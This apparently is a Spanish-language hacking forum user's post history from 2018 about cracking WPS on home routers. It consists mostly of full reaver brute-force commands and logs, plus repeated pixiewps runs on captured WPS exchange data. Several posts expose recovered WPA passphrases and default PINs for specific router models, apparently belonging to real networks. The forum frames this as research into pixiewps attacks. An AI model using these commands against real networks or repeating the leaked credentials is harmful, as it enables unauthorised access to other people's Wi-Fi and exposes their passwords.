El libre pensamiento para un internet libre

No estas registrado.  

#1 Preguntas generales y busqueda de nuevas brechas » reaver al 99% ...y no más » 21-05-2018 23:02:13

troh
Respuestas: 1

Hola, tengo que recurrir a uds porque necesito que alguien me oriente en la dirección correcta.
Resulta que estoy probando un modem a reparar, limpiarlo, resetearlo y reconfigurarlo. Se me ocurrió lanzarle reaver:

reaver -i wlan0 -b B0:48:7A:98:xx:xx -c 9 -vv -N -T 12 -t 12

Modem segun wash Vendor: AtherosC:

modem escribió:

{"bssid" : "B0:48:7A:98:xx:xx", "essid" : "mi modem", "channel" : 9, "rssi" : -94, "vendor_oui" : "00037F", "wps_version" : 16, "wps_state" : 2, "wps_locked" : 2, "wps_manufacturer" : "TP-LINK", "wps_model_name" : "TL-WR841N", "wps_model_number" : "6.0/7.0", "wps_device_name" : "Wireless Router TL-WR841N", "wps_serial" : "1.0", "wps_uuid" : "00000000000010000000b0487a98a47e", "wps_response_type" : "03", "wps_primary_device_type" : "00060050f2040001", "wps_config_methods" : "0086", "wps_rf_bands" : "01", "dummy": 0}

Googleando di con el pin 8705 desde el cual empecé, llegando hasta el 87059984 y ahí muero al 99.99%

La pregunta es que hice mal (o cuantas cosas hice mal)?

Kali linux + reaver 1.6.4 + ralink 3070 o rtl8812au (mismo resultado). No es vulnerable a pixiewps.

Inclusive de noob nomás empecé a usar otros argumentos a ver si tenía suerte.....

[email protected]:~# reaver -i wlan0 -b B0:48:7A:98:xx.xx -c 9 -vv -N -L -S -T 20 -t 20 -E -J

Reaver v1.6.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>

[+] Switching wlan1 to channel 9
[?] Restore previous session for B0:48:7A:98:xx:xx? [n/Y] 
[+] Restored previous session
[+] Waiting for beacon from B0:48:7A:98:xx:xx
[+] Received beacon from B0:48:7A:98:xx:xx
[+] Vendor: AtherosC
[+] Trying pin "87059984"
[+] Sending authentication request
[+] Sending association request
[+] Associated with B0:48:7A:98:xx:xx (ESSID: MI MODEM)
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
[+] Trying pin "87059984"
[+] Sending authentication request
[+] Sending association request
[+] Associated with B0:48:7A:98:xx:xx (ESSID: MI MODEM)
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
[+] Trying pin "87059984"
[+] Sending authentication request
[+] Sending association request
[+] Associated with B0:48:7A:98:xx:xx (ESSID: MI MODEM)
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
[+] Trying pin "87059984"
[+] Sending authentication request
[+] Sending association request
[+] Associated with B0:48:7A:98:xx:xx (ESSID: MI MODEM)
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] Trying pin "87059984"
[+] Sending authentication request
[+] Sending association request
[+] Associated with B0:48:7A:98:xx:xx (ESSID: MI MODEM)
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M3 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] Trying pin "87059984"
[+] Sending authentication request
[+] Sending association request
[+] Associated with B0:48:7A:98:xx:xx (ESSID: MI MODEM)
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] 99.99% complete @ 2018-05-21 17:56:01 (40 seconds/pin)
[+] Trying pin "87059984"
[+] Sending authentication request
[+] Sending association request
[+] Associated with B0:48:7A:98:xx:xx (ESSID: MI MODEM)
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M3 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] Trying pin "87059984"
[+] Sending authentication request
[+] Sending association request
[+] Associated with B0:48:7A:98:xx:xx (ESSID: MI MODEM)
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] Trying pin "87059984"
[+] Sending authentication request
[+] Sending association request
[+] Associated with B0:48:7A:98:xx:xx (ESSID: MI MODEM)
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
[+] Trying pin "87059984"
[+] Sending authentication request
[+] Sending association request
[+] Associated with B0:48:7A:98:xx:xx (ESSID: MI MODEM)
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response

se agradece cualquier pista ^^

#2 Re: Captura del handshake y preguntas generales » Lanzamiento del WPA3 en 2018:¿Fin del ataque por diccionario? » 30-04-2018 00:03:20

Muy interesante, la verdad, pero creo que va a pasar al menos un buen par de años antes que se hagan masivos.
Yo espero que en ese tiempo, se mejoren los ataques evil twin.
El error humano es algo que no se va a poder evitar. Ya sé que es poco, pero peor es nada.

#3 Re: Estudio de algoritmos y recopilación de PIN genéricos » Colabora con datos a la investigación sobre nuevos ataques en pixiewps » 12-04-2018 23:38:51

[email protected]:~# cat /tmp/reaver.log | python2 logfilter.py 
pke = 63d761f0c43448aa2b3fc81719aff63dc9c556741b5a37806a52de5456c12c1201a5dc5eca43eee5341cb25d0ed533eefac6cf1607922cd09eacc30e73e42b3da9f1268ae9fbfe41b07235228b538e3b1de68c5fdb020694bbbd9be5a7a9445235d4f8355f90d9f8e2271141b8c22598b716f10ad4b17e0f9f2e912af89fe33639ddc695e70558157db0640d3de425df566b6dbaba3eec10ff417df6da2ab24f4957e968043872d925a844f20cb4764e1d6c579ae3d3660a7e092c0ea6a5615d
pkr = 89b97713d5b04e72f8db488aa53bf090b11f0472ea4648e4050e2e25b98e1135804f1ee04a923f179df30dc0c822a29a83adaf4cca7e820aad9dc117a6b7e7bf742a6f9b991a2f01f8f99a5a71358646c4bbb3cf1fb6c29c6f90c66b87fb668b2220f3cfbe2fc05bbfd66cb20fb9dd20a90bbcc63abe90f99293b75201d7260eddcd8cfeeee9a9ad71e3cccd1ff9d7438bbf356cc863eccd53824d78826142237346c2abe74f3718022cdf725c02b24b837eca7da04a80ba4834895480316d5e
e_hash1 = c8b582cf63651ae6c607b262fa758d58b1f4c12195652c17e9f67a856add5523
e_hash2 = 7900622a11025f6407fcdf67ca8813b038ef66ad6289b99c506fb94aa3fcd494
authkey = 70be07bb30e79394f30f0ac5eedf02d63fe4be0326e8544fabc264194951d544
e_nonce = 8d8d488875e765ff90119123cc928c8e
e_snonce1 = e7d9057d31fb0b34a7743f7cd400174f
e_snonce2 = 62515ba48c1552477ca13978fef805cd
wpa_psk = 0042884003

running pixiewps --pke 63d761f0c43448aa2b3fc81719aff63dc9c556741b5a37806a52de5456c12c1201a5dc5eca43eee5341cb25d0ed533eefac6cf1607922cd09eacc30e73e42b3da9f1268ae9fbfe41b07235228b538e3b1de68c5fdb020694bbbd9be5a7a9445235d4f8355f90d9f8e2271141b8c22598b716f10ad4b17e0f9f2e912af89fe33639ddc695e70558157db0640d3de425df566b6dbaba3eec10ff417df6da2ab24f4957e968043872d925a844f20cb4764e1d6c579ae3d3660a7e092c0ea6a5615d --pkr 89b97713d5b04e72f8db488aa53bf090b11f0472ea4648e4050e2e25b98e1135804f1ee04a923f179df30dc0c822a29a83adaf4cca7e820aad9dc117a6b7e7bf742a6f9b991a2f01f8f99a5a71358646c4bbb3cf1fb6c29c6f90c66b87fb668b2220f3cfbe2fc05bbfd66cb20fb9dd20a90bbcc63abe90f99293b75201d7260eddcd8cfeeee9a9ad71e3cccd1ff9d7438bbf356cc863eccd53824d78826142237346c2abe74f3718022cdf725c02b24b837eca7da04a80ba4834895480316d5e --e-hash1 c8b582cf63651ae6c607b262fa758d58b1f4c12195652c17e9f67a856add5523 --e-hash2 7900622a11025f6407fcdf67ca8813b038ef66ad6289b99c506fb94aa3fcd494 --authkey 70be07bb30e79394f30f0ac5eedf02d63fe4be0326e8544fabc264194951d544 --e-nonce 8d8d488875e765ff90119123cc928c8e

 Pixiewps 1.4

 [-] WPS pin not found!

 [*] Time taken: 0 s 166 ms

Lástima que parezco el único activo en éste sector del foro.:/

#4 Re: Estudio de algoritmos y recopilación de PIN genéricos » Colabora con datos a la investigación sobre nuevos ataques en pixiewps » 21-03-2018 20:27:50

[email protected]:~# cat /tmp/reaver.log | python logfilter.py
pke = 955284a5986d9c2ec4681cb199299664a4be05b6cc7206090348a5873d69ff047f607b3d807cd586429a8fd7594593f23564678b59c329afc30fdf32146d4557bebbab5b4ebfc01d72ad781ae6d19f27b02f6ea84a21b4033a78a081eb8833ef36bb939e58f3c81380cde450095ec53d1c067ad20cb741aa0212b940d23063d1ba15e08c4e47fe11b9677d2090ab43652dd27e75f016dee6688453cb4391583044cc3e64b61886679338edab1826bd4e296954b3e3c7be1ee3e562574841aa97
pkr = ad0235fbeefd143620a567cc5eafee5a0317fd8f2feb5870f59baaaba6961be158863b7f71a8658eb6ccd7e8c46ce8d5c9e52c6ffc6e5dd6c44db1a65540a725b2852e617c9cbc392399b17cdf8c480b036a82c9d57355eb7a911479b7c28190d82b43a94dd3f6aeb7e4e3364fc184954e25c89d802dfde922e0f9194347495efd82a5da31411668ee5914a005844c04c892b4a9108f1fc8e94df528291bda874b6485ad5a5ef9a0d52e272ed1df08b7570d363dd64ec346a36c8a6b89c38a6f
e_hash1 = 45875b27774d93cc96b6af58c990438d27aa807333a41829c2a0042db473d133
e_hash2 = 4929f50810725d558634d085cb3da7af7a928199ed8fa2885c206f70a6cf4b52
authkey = 2d2b51525722e0405321c87555086c8f7ec12b2aabfdb08850078a52c0963638
e_nonce = 1dbb2ab2e62278e2a11fffd68e1192bf
e_snonce1 = 67868065183bb14051fbe218627c9403
e_snonce2 = 7cb605a654029fb854a55ff2c2238e21
wpa_psk = 0043466939

running pixiewps --pke 955284a5986d9c2ec4681cb199299664a4be05b6cc7206090348a5873d69ff047f607b3d807cd586429a8fd7594593f23564678b59c329afc30fdf32146d4557bebbab5b4ebfc01d72ad781ae6d19f27b02f6ea84a21b4033a78a081eb8833ef36bb939e58f3c81380cde450095ec53d1c067ad20cb741aa0212b940d23063d1ba15e08c4e47fe11b9677d2090ab43652dd27e75f016dee6688453cb4391583044cc3e64b61886679338edab1826bd4e296954b3e3c7be1ee3e562574841aa97 --pkr ad0235fbeefd143620a567cc5eafee5a0317fd8f2feb5870f59baaaba6961be158863b7f71a8658eb6ccd7e8c46ce8d5c9e52c6ffc6e5dd6c44db1a65540a725b2852e617c9cbc392399b17cdf8c480b036a82c9d57355eb7a911479b7c28190d82b43a94dd3f6aeb7e4e3364fc184954e25c89d802dfde922e0f9194347495efd82a5da31411668ee5914a005844c04c892b4a9108f1fc8e94df528291bda874b6485ad5a5ef9a0d52e272ed1df08b7570d363dd64ec346a36c8a6b89c38a6f --e-hash1 45875b27774d93cc96b6af58c990438d27aa807333a41829c2a0042db473d133 --e-hash2 4929f50810725d558634d085cb3da7af7a928199ed8fa2885c206f70a6cf4b52 --authkey 2d2b51525722e0405321c87555086c8f7ec12b2aabfdb08850078a52c0963638 --e-nonce 1dbb2ab2e62278e2a11fffd68e1192bf

 Pixiewps 1.4

 [-] WPS pin not found!

 [*] Time taken: 0 s 207 ms

#5 Re: Estudio de algoritmos y recopilación de PIN genéricos » Colabora con datos a la investigación sobre nuevos ataques en pixiewps » 14-03-2018 15:10:32

Uno más (?)

[email protected]:~# cat /tmp/reaver.log | python2 logfilter.py 
pke = c0a02429e084242df4e9d0eccf8317c653b404d402b9a0dae9a12e5991fdf7464d4832e417f098e0b70ba2838387275485defcbf97a98d41d20ff4401beaafd3a1d19ebf1e0854c7ed0573587af9b26636a8be40d78865733a7d07bca6fc0cfa2e7fb42cb4f8a3c764cbbc060aef5669d8303365285e917291362a2d4efc11f458c82937a69273c0f6456ef40dc8a44699fec843e35bf44e1bb0a936a26aaba4823cecbbcf0ef42e0e02863e28321a347a74eb928f4c70037167f9b61702f472
pkr = ce55ec7865d675784b2ec2b8fd65ef5f10503c7743ebd377adcdb6edc883136ddf3834e2a8ff0ebb48df9277ddf75de8951782db59e44d059fb0e51ca641a21d38cec075827e309748ef4282e3a2bfde8720447170dc708932422e8a14b6ea42cee00f9f74ae3e347471f25f2ca9a878ef516eab2821985bfa2ebe017f034de3bb86b12647b81815347a09b5c4d9d38c8bb81dff2e89a4d2f0d66f08f38fb12dc00613edd97802aea95a4360c2cf56782fddd63111fcd546b9e959d308aa28b0
e_hash1 = cd29422fd7689ef27ba7e0db179564ccbff2cee2ffe265a9eea940b57e709143
e_hash2 = 9b7c1869ea2da464f1ae69f87aaa19bb3f00f0c44ab71993b6e7a45ec14b7bc4
authkey = 401043662f58e415d92a20fea2e904bd642ac3b8db3034e9d52c45be27c9fea6
e_nonce = f78998bf48258c791f58d0d7757cdd28
e_snonce1 = b2db02aab2bc2359ebc33fcc0421ba1a
e_snonce2 = bd784eff6182d2a03b65ccfa58f77e39
wpa_psk = 0042630956

running pixiewps --pke c0a02429e084242df4e9d0eccf8317c653b404d402b9a0dae9a12e5991fdf7464d4832e417f098e0b70ba2838387275485defcbf97a98d41d20ff4401beaafd3a1d19ebf1e0854c7ed0573587af9b26636a8be40d78865733a7d07bca6fc0cfa2e7fb42cb4f8a3c764cbbc060aef5669d8303365285e917291362a2d4efc11f458c82937a69273c0f6456ef40dc8a44699fec843e35bf44e1bb0a936a26aaba4823cecbbcf0ef42e0e02863e28321a347a74eb928f4c70037167f9b61702f472 --pkr ce55ec7865d675784b2ec2b8fd65ef5f10503c7743ebd377adcdb6edc883136ddf3834e2a8ff0ebb48df9277ddf75de8951782db59e44d059fb0e51ca641a21d38cec075827e309748ef4282e3a2bfde8720447170dc708932422e8a14b6ea42cee00f9f74ae3e347471f25f2ca9a878ef516eab2821985bfa2ebe017f034de3bb86b12647b81815347a09b5c4d9d38c8bb81dff2e89a4d2f0d66f08f38fb12dc00613edd97802aea95a4360c2cf56782fddd63111fcd546b9e959d308aa28b0 --e-hash1 cd29422fd7689ef27ba7e0db179564ccbff2cee2ffe265a9eea940b57e709143 --e-hash2 9b7c1869ea2da464f1ae69f87aaa19bb3f00f0c44ab71993b6e7a45ec14b7bc4 --authkey 401043662f58e415d92a20fea2e904bd642ac3b8db3034e9d52c45be27c9fea6 --e-nonce f78998bf48258c791f58d0d7757cdd28

 Pixiewps 1.4

 [-] WPS pin not found!

 [*] Time taken: 0 s 191 ms

#6 Re: Estudio de algoritmos y recopilación de PIN genéricos » Colabora con datos a la investigación sobre nuevos ataques en pixiewps » 31-01-2018 14:49:34

Vendor broadcom:

[email protected]:~# cat /tmp/reaver.log | python2 logfilter.py 
pke = 2df8e03b37192817fe207a82d26d63d8282e77dc6150a7a7cc36dd8c292540fbe688bda7f4be8d6f30509e3308d2ed1f16593b03e6812d1b8671fa66b99683c19dbb5d3ec0aa68d19a8e9cee1297f72cad2d35273b941c0da7eb415f7454bc5b194961ab41f4f037b8dd06f2cc1cab45576433140dd918cc9973c9d2d52fdaf0bd2ba754145c7d1217c986a2d2803de5a540bd6bcef6861c41eac780bbc296e975a32858cedb3bb50d2eb39f94a272715b8c7b162521ca04a971f4c911be9f0c
pkr = ed771034e6bc5f6f87ace8fbaa1e29c924202a7893d0a545ea1d9172146304f5bde157c1e4a38a72c55afd4812fb94cac3df2035e4054a345a9f8cefb4cd353b8463270f194c609f921d105ac057e0c601678590b1c78d5c5ecdb1fa7501680c82854c8937f404b036f86b293ce1224b5c0424a0947a564243cf4e4e8541fb1c4f59845663d028c58cb0667c26e73002c6cd0b0ba7c27f04be7d8a06e29b1b3172581ea5aba229002a863f244e927f97377f20ff1ab70be9919066296eb666e7
e_hash1 = 5e707126dead4b20ee425d082d1ba55d82a97a79616e3cf3582b246b39468c52
e_hash2 = 57679e8926c3cd3cb5d3e78c217ad44fb0a4d031c5cef6d7bdf20b7be2f26118
authkey = c785e8818478aee9a62f076811aac09060231e4f1212328aece757d4c714ee97
e_nonce = 60c97db758d8e7e339e214fee278e755
e_snonce1 = 817dbdf0d5c8dcdd726e2bd2d7f64d0f
e_snonce2 = 724d15f51cfc37694b9a7f3a55902ca9
wpa_psk = MOTOSCAR1

running pixiewps --pke 2df8e03b37192817fe207a82d26d63d8282e77dc6150a7a7cc36dd8c292540fbe688bda7f4be8d6f30509e3308d2ed1f16593b03e6812d1b8671fa66b99683c19dbb5d3ec0aa68d19a8e9cee1297f72cad2d35273b941c0da7eb415f7454bc5b194961ab41f4f037b8dd06f2cc1cab45576433140dd918cc9973c9d2d52fdaf0bd2ba754145c7d1217c986a2d2803de5a540bd6bcef6861c41eac780bbc296e975a32858cedb3bb50d2eb39f94a272715b8c7b162521ca04a971f4c911be9f0c --pkr ed771034e6bc5f6f87ace8fbaa1e29c924202a7893d0a545ea1d9172146304f5bde157c1e4a38a72c55afd4812fb94cac3df2035e4054a345a9f8cefb4cd353b8463270f194c609f921d105ac057e0c601678590b1c78d5c5ecdb1fa7501680c82854c8937f404b036f86b293ce1224b5c0424a0947a564243cf4e4e8541fb1c4f59845663d028c58cb0667c26e73002c6cd0b0ba7c27f04be7d8a06e29b1b3172581ea5aba229002a863f244e927f97377f20ff1ab70be9919066296eb666e7 --e-hash1 5e707126dead4b20ee425d082d1ba55d82a97a79616e3cf3582b246b39468c52 --e-hash2 57679e8926c3cd3cb5d3e78c217ad44fb0a4d031c5cef6d7bdf20b7be2f26118 --authkey c785e8818478aee9a62f076811aac09060231e4f1212328aece757d4c714ee97 --e-nonce 60c97db758d8e7e339e214fee278e755

 Pixiewps 1.4

 [-] WPS pin not found!

 [*] Time taken: 0 s 286 ms

#7 Re: Las herramientas para attaque WPS » Reportes bugs en reaver 1.6.4 » 26-01-2018 14:27:56

Suerte que tenés tiempo para hacerlo crash; a mi me es imposible.:/
Pero en definitiva, obtengo los mismos errores que vos después de actualizar reaver y pixiewps en kali. Y me falla tanto en una rtl8187l como en la ralink 3070.

#8 Re: Las herramientas para attaque WPS » Reportes bugs en reaver 1.6.4 » 24-01-2018 15:03:34

[email protected]:~# airmon-ng
PHY	Interface	Driver		Chipset
phy0	wlan0		rtl8187		Realtek Semiconductor Corp. RTL8187
phy1	wlan1		rt2800usb	Ralink Technology, Corp. RT2870/RT3070

O sea, el -vvv me cae en errores largos mientras que algo del tipo -vv simplemente en:

[+] Sending authentication request
[!] WARNING: Receive timeout occurred
[+] Sending authentication request
[!] WARNING: Receive timeout occurred
[+] Sending authentication request

#9 Re: Estudio de algoritmos y recopilación de PIN genéricos » Colabora con datos a la investigación sobre nuevos ataques en pixiewps » 12-01-2018 18:29:51

Desde la web config del modem está habilitado. No encontré opción de "configurado" en el admin.html.
Tampoco encontré como cambiarle el pin y eso que miré un par de manuales en línea de éste TG588v.
Por lo que me lleva a pensar lo mismo que vos, que el ISP ya lo protege (lo cual me parece increible viniendo de arnet) o que reaver tiene algún bug o lo que sea que hace que aún poniendo el pin correcto caiga en un loop de errores 0x03 y 0x04.

#10 Re: Estudio de algoritmos y recopilación de PIN genéricos » Colabora con datos a la investigación sobre nuevos ataques en pixiewps » 12-01-2018 13:49:09

No hubo caso usando wpa_cli tampoco, nunca recibo un M3 y/o superiores.
Adjunto fragmentos de log por si sirve de algo.
https://workupload.com/file/vEjK6kZ

#11 Re: Estudio de algoritmos y recopilación de PIN genéricos » Colabora con datos a la investigación sobre nuevos ataques en pixiewps » 12-01-2018 00:34:40

No hay problemas!
Te comento que no pude recuperar la pass del technicolor TG588v con los argumentos que me pasaste.

agregar -N -g 1 -vvv

Una pena, el vendor de ese modem es broadcom y me interesan bastante.

#12 Re: Estudio de algoritmos y recopilación de PIN genéricos » Colabora con datos a la investigación sobre nuevos ataques en pixiewps » 10-01-2018 19:51:12

phy0	wlan0		rt2800usb	Ralink Technology, Corp. RT2870/RT3070

Technicolor DPC3848VE DOCSIS 3.0 Gateway (vendor Atheros según un wash -i wlan0 P)

[email protected]:~# cat /tmp/reaver.log | python2 logfilter.py
pke = b85769168d7c05e83a8260eca8b2eeee8190122ec5f81d351ecdaf9aa884b50804f0f1f1982eea08a92213d6573d9c34063d5791c11dc26cd54cfbdf05c06b584965ac0c88877ee1d10f6eeef03f721e4e22adcfedeeaa63d34de17c8027a442366b5fcf0a7a8430ff9d6713e6858bb805b234dcd21132f79201ad83c1ef62edb7d0e4d4821322db8f01105003abf1fc7711900b2797ab1d6e27bfa82c283aa32d177f12076603bab258f6dcb006d917b7d15574b77bbad2e2d636bba4fd83e4
pkr = 02b021a4f33c768d326382b806914253f145a4358966a8a7e567776db077fb8b00e434a3c6f888a02af744aaf54623b2f190941cc952f88a88432aa8fa82da0bf9f3f129ad71047430a891df2099cb953002710b4ac009b7dc78f15e1a28dd39cef3e57440cc2e610626218fcdafbefdc544c115e77ab3e62d35ab221b036031d3882cb77336fbffb97a667a26be16ff35389bcc88702196ab130d2d0921387d2f7c2c12e538d3e529880681f6b6341e69c429e84c5619a1a947cca2fec562a0
e_hash1 = 0fd5dbb8f1d093845ea9b6de0d1b392852b415e244d2c1e62bb5644b586cbc3a
e_hash2 = 44a1b0d6881156df26e2ceaf154e6b2b58f84e3a834fb5445f6804a479224590
authkey = 0b6413766d98a0ecd285ae8f2e023fc910a38882a3146bf4459fa279963a0ad9
e_nonce = ab090be5bc74ee409b2dac6009fdd9ff
e_snonce1 = 9fe79847b2f10cb3e06841b26f039cc8
e_snonce2 = 10e14bdc441978ee1008e7a7ee3486ae
wpa_psk = PAULINADELVALLE2015

running pixiewps --pke b85769168d7c05e83a8260eca8b2eeee8190122ec5f81d351ecdaf9aa884b50804f0f1f1982eea08a92213d6573d9c34063d5791c11dc26cd54cfbdf05c06b584965ac0c88877ee1d10f6eeef03f721e4e22adcfedeeaa63d34de17c8027a442366b5fcf0a7a8430ff9d6713e6858bb805b234dcd21132f79201ad83c1ef62edb7d0e4d4821322db8f01105003abf1fc7711900b2797ab1d6e27bfa82c283aa32d177f12076603bab258f6dcb006d917b7d15574b77bbad2e2d636bba4fd83e4 --pkr 02b021a4f33c768d326382b806914253f145a4358966a8a7e567776db077fb8b00e434a3c6f888a02af744aaf54623b2f190941cc952f88a88432aa8fa82da0bf9f3f129ad71047430a891df2099cb953002710b4ac009b7dc78f15e1a28dd39cef3e57440cc2e610626218fcdafbefdc544c115e77ab3e62d35ab221b036031d3882cb77336fbffb97a667a26be16ff35389bcc88702196ab130d2d0921387d2f7c2c12e538d3e529880681f6b6341e69c429e84c5619a1a947cca2fec562a0 --e-hash1 0fd5dbb8f1d093845ea9b6de0d1b392852b415e244d2c1e62bb5644b586cbc3a --e-hash2 44a1b0d6881156df26e2ceaf154e6b2b58f84e3a834fb5445f6804a479224590 --authkey 0b6413766d98a0ecd285ae8f2e023fc910a38882a3146bf4459fa279963a0ad9 --e-nonce ab090be5bc74ee409b2dac6009fdd9ff

 Pixiewps 1.4

 [-] WPS pin not found!

 [*] Time taken: 6 s 853 ms

Cuando tenga la oportunidad lo corro nuevamente con el flag -g 1 que me faltó en su momento. wink

Como dato de color, quiero comentar que en Kali me anda mucho mejor con reaver éste chipset ralink que mi otras realtek 8812au o la mismísima rtl8187l.

#13 Re: Estudio de algoritmos y recopilación de PIN genéricos » Colabora con datos a la investigación sobre nuevos ataques en pixiewps » 10-01-2018 15:58:05

Me quiero volver chango!
Tengo un Technicolor TG588 (C4:EA:1D), chipset broadcom cuyo default pin es 62059237
Y no le encuentro la vuelta con reaver para traer los datos necesarios con el pass. Probé un montón de flags y quedo muerto al 90.91%.:/:|

#14 Re: Estudio de algoritmos y recopilación de PIN genéricos » Colabora con datos a la investigación sobre nuevos ataques en pixiewps » 10-01-2018 12:57:59

device: VMG1312-B10B chip broadcom de acuerdo a wash.

[email protected]:~# cat /tmp/reaver.log | python2 logfilter.py 
pke = 93f03ddd4001ddbeb69bd89a01336de10ef535dde0a7c68fa1de920eb96568a8afce2f825cd2b4c113574803fa8b19b7241a6f23cc2478bf1eb1f2df1306f71886726f07a09dadc58487d71c7be8f8cc530d0557cc9d13aed3bcdb21682ef85a63d73ddbe906877fbf584112687843c3a3c40ddb73782b7662cbe74abd0040262d5f204d4c7562d7ae405ce98300b671b346dd5055c40080955622616b1ea02afdc7c73fed69596ae3d6ac70d27e3ad7cc8469c4611b8a1d494e2fa3f59ed8b7
pkr = f5d3b7bf8c900823304e13a9395f00b28c70dfd3e0f3cdd02e00b99ad2365d10300da3b7f0835bf11fa816bbe2898321d896d6461a06cb71f41c3175b7cffbddf4f46076e9bebdb5321d683e2f72ea64bc9a12881b537a5d9b4160c3e8409968a163a2cc8129105e2d24608baab1f1b59ffcb223bd352d2d2f8777d4f40ecb47d31761f3659a3c19965def168b025dcb5b1f60d3e338cb997cc9f2959b1c1a653afe89b4f9ddf77c25b11d1ed0cf7b68715bab3f75fc7f26b96903370498a2d3
e_hash1 = 9ba5e32c88bcbfc5e22100a7fe0ae633e1a4d4fc05e9cf7e4dd461e9aac8650c
e_hash2 = 29e53322c667c5e112573339c369f9b1ebadd6cda305674a86a5f4e3a6532e48
authkey = 6f809fc34b82d30205a4453f8a6a0f6af0c602714ef19666248b0321af2c6d1b
e_nonce = fd6683ca2c1bb8ce3e8eefa2b48c6a04
e_snonce1 = f58b5670a29097f3560421a4caef79db
e_snonce2 = 9802d74ada087e79463d3c8df4a669dc
wpa_psk = DE562F3DC1

running pixiewps --pke 93f03ddd4001ddbeb69bd89a01336de10ef535dde0a7c68fa1de920eb96568a8afce2f825cd2b4c113574803fa8b19b7241a6f23cc2478bf1eb1f2df1306f71886726f07a09dadc58487d71c7be8f8cc530d0557cc9d13aed3bcdb21682ef85a63d73ddbe906877fbf584112687843c3a3c40ddb73782b7662cbe74abd0040262d5f204d4c7562d7ae405ce98300b671b346dd5055c40080955622616b1ea02afdc7c73fed69596ae3d6ac70d27e3ad7cc8469c4611b8a1d494e2fa3f59ed8b7 --pkr f5d3b7bf8c900823304e13a9395f00b28c70dfd3e0f3cdd02e00b99ad2365d10300da3b7f0835bf11fa816bbe2898321d896d6461a06cb71f41c3175b7cffbddf4f46076e9bebdb5321d683e2f72ea64bc9a12881b537a5d9b4160c3e8409968a163a2cc8129105e2d24608baab1f1b59ffcb223bd352d2d2f8777d4f40ecb47d31761f3659a3c19965def168b025dcb5b1f60d3e338cb997cc9f2959b1c1a653afe89b4f9ddf77c25b11d1ed0cf7b68715bab3f75fc7f26b96903370498a2d3 --e-hash1 9ba5e32c88bcbfc5e22100a7fe0ae633e1a4d4fc05e9cf7e4dd461e9aac8650c --e-hash2 29e53322c667c5e112573339c369f9b1ebadd6cda305674a86a5f4e3a6532e48 --authkey 6f809fc34b82d30205a4453f8a6a0f6af0c602714ef19666248b0321af2c6d1b --e-nonce fd6683ca2c1bb8ce3e8eefa2b48c6a04

 Pixiewps 1.3

 [-] WPS pin not found!

 [*] Time taken: 0 s 82 ms

#15 Re: Wireless, Internet, Redes y Hacking » fluxion » 09-01-2018 23:05:27

Sorry boss, no quería cambiar de tema sobre fluxion. Solo comenté que me iba mejor wifimosys.
Te hice caso en algunos puntos pero no me reconoce el driver rtl8812au para ponerlo en modo monitor y empezar a escanear.

Supongo que habrá que abrir tema.
Saludos!

#16 Re: Wireless, Internet, Redes y Hacking » fluxion » 09-01-2018 19:46:12

Si revisan bien la oración, verán que hablaba de wifimosys. lol

#17 Re: Estudio de algoritmos y recopilación de PIN genéricos » Colabora con datos a la investigación sobre nuevos ataques en pixiewps » 09-01-2018 00:00:52

A ver si lo hice bien:

[email protected]:~# cat /tmp/reaver.log | python2 logfilter.py 
pke = f3d3801bb8f7000174bb3f8ddcbc17ee5fe10ec5c3ad234329adb6bc7b978486a2ed20f95aa672641d51b9da7b5de8349ba33605f16cc48c543774edd3369ee4cc08e492c6ed0fe1f1c4b836bb9d03970189ff62ce2e3f381e8dfbf1859dafb51699ad51d503d8c377f2008c7e020977ef31583313da3e35b46777ff04605ffee50bffa2e3fd0686c1b7f8bd1ba5d945c7e4d28e2099664bb3620d66cced116bd85cfb7b1f46c97caee100f1e9706b6922bf19d8e742673061cbf6ad9e4e4484
pkr = 984acf84c1be94de3b3c89a1673557a49f6b72c93d09bbfbf1e9dc3c8ff260f3a50cdeaaf4701ccdf3df903222ccf9ed79e00183ef1e4a52e2d564f7a9260afef7a82e1f2435862185be5373d3ce1327a52588f8dd7961c76f6fd99574f21fca5e2d882ade54ffefe0f35d437dd8d65a9bcd9f0b6ccbbefa18b9ec892d45b365171750a1bcd9a04ced46f77db0a948529487ffdbaccf527f7626f9b990eec16b4fa826fee6bbc5aef70dfb9ab0824baafd767281f58c3623136ffa0c5a4533be
